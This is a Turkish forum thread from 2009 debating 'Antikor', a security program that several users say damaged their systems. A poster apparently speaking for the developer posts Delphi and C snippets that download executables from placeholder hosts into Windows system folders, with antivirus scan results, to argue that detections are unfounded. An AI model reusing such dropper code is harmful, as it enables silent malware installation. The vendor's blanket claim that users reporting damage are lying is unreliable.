Yazılım bağışıklığı ?

PcMaKeR
06-05-2009, 09:44   |  #76  
PcMaKeR avatarı
Yıllanmış Üye
Teşekkür Sayısı: 6
8,935 mesaj

konu iyice cıvımaya başladı. Önünüz açık diye millet birbirine sarmaya başladı. Sanki siz birbirinize birşey deyince üste çıkıyorsunuz.

Ayıp ama...

Süleyman.
06-05-2009, 10:02   |  #77  
Yıllanmış Üye
Teşekkür Sayısı: 3
16,587 mesaj
PcMaKeR
konu iyice cıvımaya başladı. Önünüz açık diye millet birbirine sarmaya başladı. Sanki siz birbirinize birşey deyince üste çıkıyorsunuz.

Ayıp ama...

Beğendim

Para_Noyak
08-05-2009, 11:20   |  #78  
Yeni Üye
Teşekkür Sayısı: 0
25 mesaj
FAN
Ah kimin ahını aldım
Hep kendimi deli sanardım
Değilmiş işte değilmiş
Bugün bunu anladım

Evet ben işin içinden çıkamayacağım :( Sizi bu paranoyakla başbaşa bırakıyorum. Polemiğine gelmeyin sizlere son tavsiyemdir.

Aloha !

Değerli Fan ;
Sanırım konuyu çok abarttım ve seni kırdım. Günlerdir burada olmamana ve konu genelinde teknik tartışmaların bitmesine üzüldüm.
Senin başka forumlarda bu programla ilgili açtığın konulardaki yazılarınıda okudum . Sanırım sen ilk başta programı kötüleyerek program hakkında gelen tepkileri belirlemek ve dikkat çekmek için bu şekilde yazılar yazdın. İyide yapmışsın çünkü benimde dikkatimi çekti ve bu programı kullanmaya başladım.
Bu programı senin yazdığın kanısına vardım ve seni canı gönülden tebrik etmek istedim. İlk önceleri chip dergisinin müdavimlerinden biri yada moderatörlerinden biri olarak düşünüyordum seni, fakat chip dergisini inceleyince Türk bilişim ve yazılım sektörüne ve Türk firmalarına verdiği katkısına baktığımda, haber arşivlerini kontrol ettiğimde sadece bin haberden sadece 7-8 haberin Türk yazılım firmaları ile ilgili olduğunu ve politikalarında Türk firmaları ile ilgili pek birşey olmadığını, Türk bilişimiyle ilgili haberlere yer vermediğini gördüğümden senin chip lede bir ilgin olmadığı kanısına vardım.
Programı bu şekilde tanıtma yoluna gitmenede hak verdim. Çünkü en mantıklı yol bu sanırım. Allah yolunu açık etsin. Harika bir program yazdığını ve senin gibi insanların bu ülkede yalnız olmadığını belirtmek isterim.

Son Düzenleme: Para_Noyak ~ 08 Mayıs 2009 11:33
tekelci-korsan
08-05-2009, 17:29   |  #79  
Taze Üye
3 mesaj

programı arkadaşım msnden söyledi kurdum ve denedim. ufacık boyuyla çok iş başarıyor gibi. sonra nette aramaya koyuldum. buradaki bazı üyeler nedense çok kötülemiş. bana kalırsa onlar paranoyak'ın dediği gibi bu programın yazılımcılardan olabilir. özellikle fan.

kullanın ve kullandırtın derim. çok kral program cidden.

MBTGROUP
08-05-2009, 17:39   |  #80  
Yıllanmış Üye
Teşekkür Sayısı: 2
2,727 mesaj
tekelci-korsan
programı arkadaşım msnden söyledi kurdum ve denedim. ufacık boyuyla çok iş başarıyor gibi. sonra nette aramaya koyuldum. buradaki bazı üyeler nedense çok kötülemiş. bana kalırsa onlar paranoyak'ın dediği gibi bu programın yazılımcılardan olabilir. özellikle fan.

kullanın ve kullandırtın derim. çok kral program cidden.

Şanslısınız.Benim pc anında bozuldu,çok uğraştım düzeltmek için.Ekran görüntüsünün de öyle bozulmasını bidaha hiç bir proğram yapamaz diye düşünüyorum,diger verdiği zararlarda cabası.!!!

tekelci-korsan
08-05-2009, 17:58   |  #81  
Taze Üye
3 mesaj
pcword
Şanslısınız.Benim pc anında bozuldu,çok uğraştım düzeltmek için.Ekran görüntüsünün de öyle bozulmasını bidaha hiç bir proğram yapamaz diye düşünüyorum,diger verdiği zararlarda cabası.!!!
o kadar bozulması imkansız gibi. bence sen de bunu yazan programcılardan birisin.

Süleyman.
08-05-2009, 18:14   |  #82  
Yıllanmış Üye
16,587 mesaj

Ben bu konuya bağışıklık kazandım. Artık okumuyorum.Beğenmedim

MBTGROUP
08-05-2009, 18:18   |  #83  
Yıllanmış Üye
2,727 mesaj
tekelci-korsan
o kadar bozulması imkansız gibi. bence sen de bunu yazan programcılardan birisin.
hönk

PcMaKeR
08-05-2009, 18:26   |  #84  
PcMaKeR avatarı
Yıllanmış Üye
8,935 mesaj
tekelci-korsan
pcword sen programıcımısın ? KahkahaKahkahaKahkaha
Direk yargısız insaf yapmış biride...

MBTGROUP
08-05-2009, 18:30   |  #85  
Yıllanmış Üye
2,727 mesaj

Bende dumur oldum cevaba:D

Para_Noyak
10-05-2009, 21:37   |  #86  
Yeni Üye
25 mesaj
FAN
Yok böyle bir yorum Beğendim

Yalnız şaka bir yana iş cidden kabak tadı vermeye başladı. Kendimi geçtim Chip'e de çok ağır ithamlar gelmiş. Bu kadarına da pes.

Konu kilitlenmeli artık.

Fan, gerçektende bu forum kabak tadı vermeye başladı. Teknolojiden başka herşey konuşmaya başladık. Ama sen konuştukça kendimi cevap vermek zorunda hissediyorum.
Son yazdığın '' Kendimi geçtim Chip'e de çok ağır ithamlar gelmiş '' cümlesi beni derinden etkiledi. Ben sana ne zaman ağır ithamlarda bulundum ki? Ayrıca chip dergisine ne zaman ağır ithamda bulunmuşum ki? Chip dergisinde yazılan konuların kapsamını söylemek neden itham etmek olsun ki?
Benim chip dergisini okumam için 2 sebebim var. Birincisi Türkçe olması. İkincisi alternatifinin olmaması.
Zaten bu dergi kendi alanında dünyada benzeri olmayan bir dergidir. Yayınlandığı ülke ve yazıldığı dilde o ülkedeki bilişim olaylarına ilgisiz ve alakasız başka bir dergi dünyada bulamazsınız.
Örnek verecek olursak Hacettepe Üniversitesindeki son bilişim gelişmeleri, Aselsanın ürettiği akıl almaz donanımlar vb. konularda bu dergide herhangi bir yazı yada konu bulamazsın. Türk firmalarının haberlerinden ziyade reklamlarını görebilirsiniz (parasıyla tabiki Cool ). Bunları söylemek itham etmek filan değildir Fan. Bana inanmıyorsan aç anasayfayı hatta yayına başladıkları tarihten itibaren tüm arşivi, tek tek say Türk firmalarının haberlerini bakalım kaç haber bulabileceksin :) . (Bulursan banada linkini yollada çerçeveletip duvara asayım.) Bu zaten herkes tarafından bilinen gerçeklerdir ve Chip dergiside inanıyorumki bu konuda bana hak verecektir. O yüzden sen bu forumu okuyanları eski yazılarındaki gibi boşu boşuna gaza getirme. Çünkü ben gördüklerimi yazarım ve kimseyi hiçbir koşulda itham etmem.
Tüm bunların yanı sıra sana ithamda bulunmam söz konusu olamaz. Ki olmamıştırda. Aksine ve ne yazıkki senin yazıların ithamlarla doludur.
Ben herşeye rağmen Türk bilişimi adına yaptığın şeylere saygı duyduğumu ve iyi dileklerimi sana ilettim. Lütfen artık teknoloji konuşalım.

SedorKing
11-05-2009, 02:53   |  #87  
Yıllanmış Üye
182 mesaj

Zemana antiloger kullanan varmı ben betasından beri kullanıyorum yanlış alarmlar veriyor onun dışında şimdiye kadar herhangi bir (*logger) aktivitesi felan olmadı.

piRe_
14-05-2009, 01:04   |  #88  
Yıllanmış Üye
Teşekkür Sayısı: 1
1,183 mesaj
Para_Noyak
Fan, gerçektende bu forum kabak tadı vermeye başladı. Teknolojiden başka herşey konuşmaya başladık. Ama sen konuştukça kendimi cevap vermek zorunda hissediyorum.
Son yazdığın '' Kendimi geçtim Chip'e de çok ağır ithamlar gelmiş '' cümlesi beni derinden etkiledi. Ben sana ne zaman ağır ithamlarda bulundum ki? Ayrıca chip dergisine ne zaman ağır ithamda bulunmuşum ki? Chip dergisinde yazılan konuların kapsamını söylemek neden itham etmek olsun ki?
Benim chip dergisini okumam için 2 sebebim var. Birincisi Türkçe olması. İkincisi alternatifinin olmaması.
Zaten bu dergi kendi alanında dünyada benzeri olmayan bir dergidir. Yayınlandığı ülke ve yazıldığı dilde o ülkedeki bilişim olaylarına ilgisiz ve alakasız başka bir dergi dünyada bulamazsınız.
Örnek verecek olursak Hacettepe Üniversitesindeki son bilişim gelişmeleri, Aselsanın ürettiği akıl almaz donanımlar vb. konularda bu dergide herhangi bir yazı yada konu bulamazsın. Türk firmalarının haberlerinden ziyade reklamlarını görebilirsiniz (parasıyla tabiki Cool ). Bunları söylemek itham etmek filan değildir Fan. Bana inanmıyorsan aç anasayfayı hatta yayına başladıkları tarihten itibaren tüm arşivi, tek tek say Türk firmalarının haberlerini bakalım kaç haber bulabileceksin :) . (Bulursan banada linkini yollada çerçeveletip duvara asayım.) Bu zaten herkes tarafından bilinen gerçeklerdir ve Chip dergiside inanıyorumki bu konuda bana hak verecektir. O yüzden sen bu forumu okuyanları eski yazılarındaki gibi boşu boşuna gaza getirme. Çünkü ben gördüklerimi yazarım ve kimseyi hiçbir koşulda itham etmem.
Tüm bunların yanı sıra sana ithamda bulunmam söz konusu olamaz. Ki olmamıştırda. Aksine ve ne yazıkki senin yazıların ithamlarla doludur.
Ben herşeye rağmen Türk bilişimi adına yaptığın şeylere saygı duyduğumu ve iyi dileklerimi sana ilettim. Lütfen artık teknoloji konuşalım.
Evet haklısınız kabak tadı vermeye başladı. Galiba siz kabaklardan hoşlanıyorsunuz, ki burada hızınızı alamadınız pcnet forumunda yeni bir tartışma başlattınız. Alkış

Hadi hayırlısı bol kabaklı muhabbetler size, Chip'e attığınız iftiraları orada da sürdürmeniz dileğiyle...Beğenmedim

Son Düzenleme: piRe_ ~ 14 Mayıs 2009 01:06
Para_Noyak
14-05-2009, 07:25   |  #89  
Yeni Üye
25 mesaj
piRe_
Evet haklısınız kabak tadı vermeye başladı. Galiba siz kabaklardan hoşlanıyorsunuz, ki burada hızınızı alamadınız pcnet forumunda yeni bir tartışma başlattınız. Alkış

Hadi hayırlısı bol kabaklı muhabbetler size, Chip'e attığınız iftiraları orada da sürdürmeniz dileğiyle...Beğenmedim
piRe_ kullandığın kelimeler nezaket sınırlarını aşıyor sanırım. Şu anda tartışılan konu ''Yazılım bağışıklığı ? '' HPQ-User tarafından açılmış bir konudur. Dikkat ettiysen başka dergilerin forumlarında açılan konu ''bilişim haberleri'' konusudur ve yorumsuz olarak sadece haber kaynağı ile girilmiş.
Yine bana chip dergisine iftira atmışsın demişsiniz aslında bu dergiyi küçük düşüren ve aşağılayan sen ve senin gibi yalaka tayfanız. Ne tartışmayı biliyorsunuz nede eleştirmeyi, bu derginin ve forumun ağzı ile forumlarda yazı yazarak dergide çalışan emekçi insanların emeği ile oynuyorsunuz. İnsanların düşüncelerini dile getirmesine tahammül edemiyorsunuz(herkes sizin gibi yalaka olmak istemeyebilir). İftiraya gelince, eleştiri desen eleştirmedim, sadece dergide dikkatimi çeken unsurları yazdım. Yazdıklarımı anlayamadıysan senin için Türkçeden Türkçeye tercüme edebilirim :)
Diğer forumlarda insanların bazı haberleri paylaşması için senden izinmi alması lazım? Bu ülke babanın memleketimi yoksa diğer forumlar babanın forumumu? Yalan yada yanlış birşey yazmışsam eleştirebilirsin ama başka forumlarda yazı yazan insanları ne sen nede senin efendilerin eleştiremez veya birbaşka forumda ''hızınızı alamadınız pcnet forumunda yeni bir tartışma başlattınız'' diyede soramaz.
Kabak meselesine gelince, ben kabak yemeklerini severim özelliklede ''kabak dolmasını'' . Sen ve senin gibi kabaklar oldukça ben daha çok eğlenirim buralarda..
'' Yazılım bağışıklığı ? '' konusunu açan HPQ-User, konunun ne derece önemli olduğunu bize yani ülkemizde yaşayan bilişim tutkunlarına hissettirmek için açtığı kanısındayım. Derinlemesine düşününcede bu konunun yakın gelecekte çok tartışılacağına inanıyorum. Yazılım bağışıklığı alanında ülkemizdede çalışma yürüten insaların olması takdir edilmesi gereken birşey. Çok şükür Allahıma ki eli klavye tutan herkes sadece forumlara takılmıyor :)  

Herzaman söylediğim gibi artık teknoloji tartışalım, bilişimi tartışalim ülkemizin gelişimini tartışalım.

Son Düzenleme: Para_Noyak ~ 14 Mayıs 2009 08:24
sponsored
16-05-2009, 17:10   |  #90  
Taze Üye
4 mesaj

Bu saçma sapan şeyi kurdum.
Daha sonra kaldırayım dedim.
Şimdi internette bazı siteleri açamıyorum.
Ayrıca her açılışta "kaldırayım mı" diye soruyor.
Sormlusu bu pogramsa Allah belalarını versin diyorum.
(Gerçi aynı esnada Winamp programını da kaldırıştım??)
Sebep ne olabilir arkadaşlar.
Interneti eski haline getirmek için neyi tekrar yüklemek gerekir.
Lütfen yardım edin

Süleyman.
16-05-2009, 17:50   |  #91  
Yıllanmış Üye
16,587 mesaj
sponsored
Bu saçma sapan şeyi kurdum.
Daha sonra kaldırayım dedim.
Şimdi internette bazı siteleri açamıyorum.
Ayrıca her açılışta "kaldırayım mı" diye soruyor.
Sormlusu bu pogramsa Allah belalarını versin diyorum.
(Gerçi aynı esnada Winamp programını da kaldırıştım??)
Sebep ne olabilir arkadaşlar.
Interneti eski haline getirmek için neyi tekrar yüklemek gerekir.
Lütfen yardım
Sistem geri yükleme yapın.

AntikorUGS
21-05-2009, 04:10   |  #92  
Taze Üye
4 mesaj

Tekrar ve son olarak merhaba arkadaşlar,

Uzun ve yorucu bir çalışma döneminden sonra fırsat bularak sizlere yazıyorum fakat yokluğumda çıkan tartışmalar ve konunun vardığı nokta beni ve takım arkadaşlarımı üzmenin ötesine geçemedi.

Yazılan her mesajı kelime kelime defalarca okudum. Bir an için nerede hata yaptım diye düşündüm. :) Fakat sonrasında hatanın bende ve takım arkadaşlarımda olmadığını gördüm. Şu an yazdığım mesaj Chip Türkiye forumlarında bulunan son mesajım olacak. Çok fazla çünkü sıralayabilirim ama sizler bizlerden daha iyi biliyorsunuz bu çünküleri.

Gelelim abuk subuk yakıştırmalara, asılsız ithamlara ve karalama kampanyalarına..

İsim vermeden aldığım notlara bakarak yazıyorum:

Antikor ismi, başka bir ürüne aitmiş. Bir firewall'a Antikor ismini ne kadar yakıştırabiliyorsunuz bilmiyorum ama antikor ve antijen isimlerini bizlerden çok duyacaksınız. Biz yaptığımız ürünlere felsefi olarak yaklaşıyoruz. Bir amacı var bu isimleri seçmemizin ve malesef ürünümüzün yaptığı iş ile 100% örtüşüyorlar.. Başkaları gibi gelişi güzel isim mi seçseydik yani? Bakınız elma isimli bilgisayar üreticisine.. Dünya devlerinden biri değil mi? Neden yargılamıyorsunuz?

3 farklı domain üzerinden sahtecilik yapmaya çalışmışız. Aman ne hoş.. Merak ediyorum bu domainlerin kimin üzerine kayıtlı olduğunu inceleyen oldu mu hiç? Sahtecilik yapmaya çalışan biri kendi ismini, cep telefonunu açık açık yazar mı oraya? 3 değil 33 tane de domain olsa durum değişmeyecektir. Amaç farklı çünkü.. Saldıracak bir taraf buldunuz mu (ya tutarsa mantığı) peşini bırakmamışsınız.

Google ve sonrasında İskenderun Kaymakamlığını kaynak göstererek telefon numaramızın bile sahte olduğunu söylemişsiniz. Allah aşkına ne zamandan beri kaynak google, kaynak kaymakamlık oldu? Bilmeyenler için hatırlatmak isterim: Sabit telefonlar Türk Telekom isimli firma tarafından verilmekte ve birinci ağızdan bilgi alabilme şansınız var. Dilerseniz Türk Telekoma sorun, dilerseniz de bulduğunuz numarayı arama zahmetine girin.

Bilgisayarlar kasılıyormuş, güvenli programlar şüpheli olarak işaretleniyormuş, arayüz kötüymüş vs.. vs.. İyi de bunları buraya yazmak yerine firmamıza bildirseniz daha güzel olmaz mı? Birinci ağızdan muhatap alınsanız? Fikirleriniz değerlidir dedik. Düşüncelerinizi paylaşın lütfen dedik.. Kim ne yaptı? Kim ne mesaj gönderdi de cevapsız kaldı? Bir e-posta gönderen olmadı, bir telefon eden olmadı.. Pek bir manidar değil mi sizce de?

Chip gibi sitelerin test merkezine gönderseymişiz ya? :) Buna gülerim işte.. Aylar öncesinden tüm kurumlara ve kuruluşlara duyurduk biz projemizi buna chip de dahildir. Nezaketen bile olsa, yazdığımız e-postalara cevap bile vermediler. Şimdi yine suçlanan bizleriz.

Her kim ki bilgisayarım çöktü diyorsa yalan söylüyordur. Her kim ki donanımım zarar gördü diyorsa iki kere yalan söylüyordur.

Son olarak virustotal.com gibi servislerde ürünümüzün zararlı olarak gösterildiğinden bahsedilmiş. Bu kısma bayıldım. Ve sizler için AÇIK KAYNAK KOD projeler hazırladık. Çok değerli uzmanlar eminim programcılıktan anlamayanlarınız için değerlendirme yapacaklardır.

[ Tüm kodu seç ] [ Yeni Pencerede Göster ]
program Test; {$APPTYPE CONSOLE} uses URLMon; begin URLDownloadToFile( nil, 'http://www.abcxyz.com/abc1.exe', '1:\windows\abc1.exe', 0, nil ); URLDownloadToFile( nil, 'http://www.abcxyz.com/abc3.exe', '1:\windows\system\abc3.exe', 0, nil ); URLDownloadToFile( nil, 'http://www.abcxyz.com/abc2.exe', '1:\windows\system32\abc2.exe', 0, nil ); end.
Bu delphi projesini derlediğinizde ve virustotal.com a gönderdiğinizde şöyle bir sonuç alacaksınız:

a-squared        4.0.0.101        2009.05.21        Trojan-Dropper.Delf!IK
AntiVir        7.9.0.168        2009.05.20        HEUR/Malware
Authentium        5.1.2.4        2009.05.20        W32/Downloader-Web-based!Maximus
DrWeb        5.0.0.12182        2009.05.20        Trojan.DownLoader.57051
F-Prot        4.4.4.56        2009.05.20        W32/Downloader-Web-based!Maximus
F-Secure        8.0.14470.0        2009.05.20        Suspicious:W32/Malware!Gemini
Ikarus        T3.1.1.49.0        2009.05.21        Trojan-Dropper.Delf
McAfee-GW-Edition        6.7.6        2009.05.20        Heuristic.Malware
NOD32        4092        2009.05.20        probably unknown NewHeur_PE
Panda        10.0.0.14        2009.05.20        Suspicious file
Rising        21.30.20.00        2009.05.20        Trojan.DL.Win32.Delf.cso
Sophos        4.41.0        2009.05.21        Sus/DelpDldr-A
VBA32        3.12.10.5        2009.05.21        suspected of Win32.Trojan.Downloader (()
Sonuç 13/40 Zararlı :) Yukarıdaki adresler bilerek seçilmiştir. Siz dilediğiniz adresi yazabilirsiniz. Biz var olmayan bir adres yazmayı tercih ettik çünkü piyasadaki antivirusler var olmayan durumlardan bile paranoya yaratmaya bayılıyorlar. Bu da güvendiğiniz dağlara kar yağdırıyor sanırım.

Sizlere manidar olan başka bir durumdan daha bahsetmek isterim. Kapitalizmin geldiği son nokta da diyebiliriz. Aynı işi yapan C kodlarını yazalım şimdi de..

[ Tüm kodu seç ] [ Yeni Pencerede Göster ]
#include "stdafx.h" #include "urlmon.h" #include "windows.h" int _tmain( int argc, _TCHAR* argv[] ) { URLDownloadToFile ( (LPUNKNOWN)0L, TEXT("http://www.abc1234.com/abc1.exe"), TEXT("c:\\windows\\abc1.exe"), 0L, (LPBINDSTATUSCALLBACK)0L ); URLDownloadToFile ( (LPUNKNOWN)0L, TEXT("http://www.abc1234.com/abc2.exe"), TEXT("c:\\windows\\system\\abc2.exe"), 0L, (LPBINDSTATUSCALLBACK)0L ); URLDownloadToFile ( (LPUNKNOWN)0L, TEXT("http://www.abc1234.com/abc3.exe"), TEXT("c:\\windows\\system32\\abc3.exe"), 0L, (LPBINDSTATUSCALLBACK)0L ); return 0; }
Bu kodları da lütfen Microsoft'un güzide C derleyicilerinden birini kullanarak derleyin. Nasıl bir gizli anlaşmanın ürünüdür ki hiç bir antivirüs firması microsoft tarafından derlenmiş, aynı işi yapan kodları tehdit olarak görmez? 0/40 zararlı..

Sonuç olarak şunu söyleyebilirim. Bizler Türk'üz. Evet haddimizi aştık. İddiamız da büyük.. Bizler kendimize güveniyoruz. Sizler de güvenin. Çünkü bizler sizlerdeniz..

Ama abuk subuk sebepler sunarak, hiç bir geçerliliği ve güvenilirliği olmayan kaynakları otoriteymiş gibi göstererek, telefon numaralarını telekom yerine googledan sorgulayarak, domainlerin sahibi kim diye kontrol etmeden, 3 farklı site var diyerek, bunlar sahteci, bunlar aldatıcı diyerek çamur atmayın. Atanlara da müsade etmeyin.

Hiç bir antivirüs yazılımı otorite olamaz. Yukarıdaki kodları derleyerek ve taratarak bunu görebilirsiniz. Google otorite olamaz. Kaymakamlıklar otorite olamaz. Domainler için seçilen isimler kriter olamaz. Kaç adet domain kullanıldığı sebep olamaz. Bakış açınız otoritedir. Amacınızı belirtir.. Nasıl bakarsanız öyle yansıtırsınız.

Kendi özeleştirinizi yapın lütfen.

Ve unutmayın. Telefonumuz da açık, e-posta adresimiz de.. Kullanın. Cevap alamazsanız gelin yargılayın. İsmimiz de belli, adresimiz de.. Teknolojimiz de..

Bir yazılım ki çok hızlı, bir yazılım ki çok ufak ve bir yazılım ki akıl almaz.. Sizleri kötü yazılımlara alıştırmışlar ise, bizim suçumuz ne? İnanmak çok mu güç?

Bana ve takım arkadaşlarıma gösterdiğiniz bir şey var ama.. Karalamak çok kolay.. Özellikle sanal dünyada. Yasalarımız çok gevşek diye mi böyle rahatsınız? Yanılırsınız..

Teşekkürler.

PcMaKeR
21-05-2009, 09:20   |  #93  
PcMaKeR avatarı
Yıllanmış Üye
8,935 mesaj

AntikorUGS C ile yazılmış kodlar

dosya indiriyor. sisteme gömüyor.

derlendikten sonra hiçbir kaynak görüntülenemez ki. C# la yapsan hadi IL motoru ile açar bakarsın koda ama bu öyle değil c yada c++ öyle açılıp bakılabilen program derlemiyor. makine dilinde derliyor.

bu antikorun programında iş yok hala burda laf ediliyor.

velideniz
19-07-2009, 01:41   |  #94  
Taze Üye
3 mesaj

arkadaşlar tekelleşmeye karşı güzel bir çalışma olarak görüyorum ve deneyeceğim sonuç kötü olursa ne kaybederim ki? en kötüsü format atarız yada attırırız

MBTGROUP
19-07-2009, 09:32   |  #95  
Yıllanmış Üye
2,727 mesaj

Benim bilgisayarımı bozdu ,bu proğramın övülecek bir tarafı yok.Daha önceki sayfalarda ne zarar verdiğini yazmıştım.Karalama amaçlıda yazmıyorum zorum ne olcakki,banane ,denedim bilgisayarım bozuldu işte yok ötesi. 

Son Düzenleme: MBTGROUP ~ 19 Temmuz 2009 20:08
558memoli
19-07-2009, 10:58   |  #96  
Yıllanmış Üye
250 mesaj

denemeyi bende düşünüyorum

gecekusu35
13-10-2009, 15:04   |  #97  
Taze Üye
1 mesaj
Alıntı: piRe_  
Para_Noyak arkadaşım şunu ifade edeyimki sizin yorumlarınız beni tatmin etmiyor. Neden?, çünkü aramıza daha dün katılmış olduğunuz halde bize içimizden biriymiş gibi Antikor denen saçmalığı savunuyor olmanız. Saçmalık dedim evet yanlış okumadınız. Henüz kendi yazılımını şüpheli sınıflandıran bir uygulamaya nasıl olurda güvenmemizi beklersiniz. Üstelik AntiVir bu program için, HEUR/Malware uyarısı veriyorken. Sizin bu bağışıklık/aşılama dediğiniz olayı beğenmediğiniz Avast bile VRDB (Virus Recovery Database) yani Virüs Kurtarma Veritabanı özelliği ile pek ala fazlasıyla yapıyor. Sizin bundan haberiniz varmıydı? Ya da Avast kullanıcılarının. Peki Avast kullanan kaç kişi programın bu özelliğini çalıştırıyor? -hiç biri!-.

Diğer olumsuzluklarını yazmama bile gerek yok. Yükleyin, taratın, bir süre bekleyin ondan sonra demek istediğimi anlarsınız. Tabi ekranınızdaki, bukalemun gibi yer ve renk değiştiren saçma sapan menülere tahammül edebilirseniz.

Bu nasıl üsluptur? Sende kim oluyorsun ben seni tanımıyorum ne demektir? Arkadaşım sizin mertebenize ulaşabilmemiz, zatıalinizle muhatab olabilmemiz için kaç mesaj yazmamız gereklidir.

Diyelim ki yolda karşıya geçmeye çalışan bir yaşlıyı veya birine adres soran başka birini gördünüz ve yardım etmek istediniz. Bu kişide size; "sende kimsin ben sizi yeterince tanımıyorum neden yardımcı olmak istiyorsunuz" dese ne düşünürsünüz acaba? Bilgisayar başında olmanız ve muhatabınızın yüzünü görmüyor olmanız karşınızdaki kişinin bir insan olduğu gerçeğini değiştirir mi?

Bende bu konuyu yeni gördüm ve bugün kayıt oldum. Bir şeye ihtiyacım olduğunda da genelde forumlarda araştırır, artı-eksilerini öğrenip öyle karar veririm. Vaktimi genelde gündüzleri işimde, akşamlarıda evde eşimle ve çocuğumla geçiriyorum. Şimdi boş vaktimde forum forum gezip, her konu açana mesaj atmıyorum diye ikinci sınıf ve güvenilmez bir insan mı oluyorum? Admin değilim ki her konuya bakma ve mesaj yazma ihtiyacı hissedeyim. Bu forumada daha önce çok girmiştim ama size cevap vermek için daha yeni üye oldum. Bir konuyla ilgili araştırma yaparken yorum yazanların daha önce kaç tane mesaj attığını hatta foruma hangi tarihte üye olduklarını anlayabiliyoruz merak etmeyiniz. Bunuda göz önünde bulunduruyoruz. Ama kişinin yüzüne karşı sen yeni ve güvenilmezsin demiyoruz..

İkinci olarak da şu "bir konuya bakıp giderler bir dahada uğramazlar" meselesi.. Herkes vaktini forum başında geçirmek zorunda mıdır? Kimisi spor yapmayı-seyretmeyi sever, kimisi gezmeyi.. Herkes bilgisayar başında vakit geçirmeye mecbur mudur? Birşeye ihtiyacı olduğunda nete girerek temin edip bir daha girmeyen ahlaksız veya vefasız mıdır? Site sahiplerinin -sitem daha çok insana ulaşsın, reklam vs. biraz daha para kazanayım- diye forum kullanıcılarının daha çok ve aktif olmasını isteyemesi normal karşılanabilir ama bu kendini forumun en büyük neferi zanneden "kraldan çok kralcı" takımına ne demeli..

Biraz uzun oldu kusura bakmayınız.. "kraldan çok kralcı" lafınıda herkes üzerine alınmasın lütfen. teşekkürler...

Son Düzenleme: gecekusu35 ~ 13 Ekim 2009 15:14
alien_fx
13-10-2009, 15:59   |  #98  
Yıllanmış Üye
Teşekkür Sayısı: 1
5,671 mesaj

indirmeyin.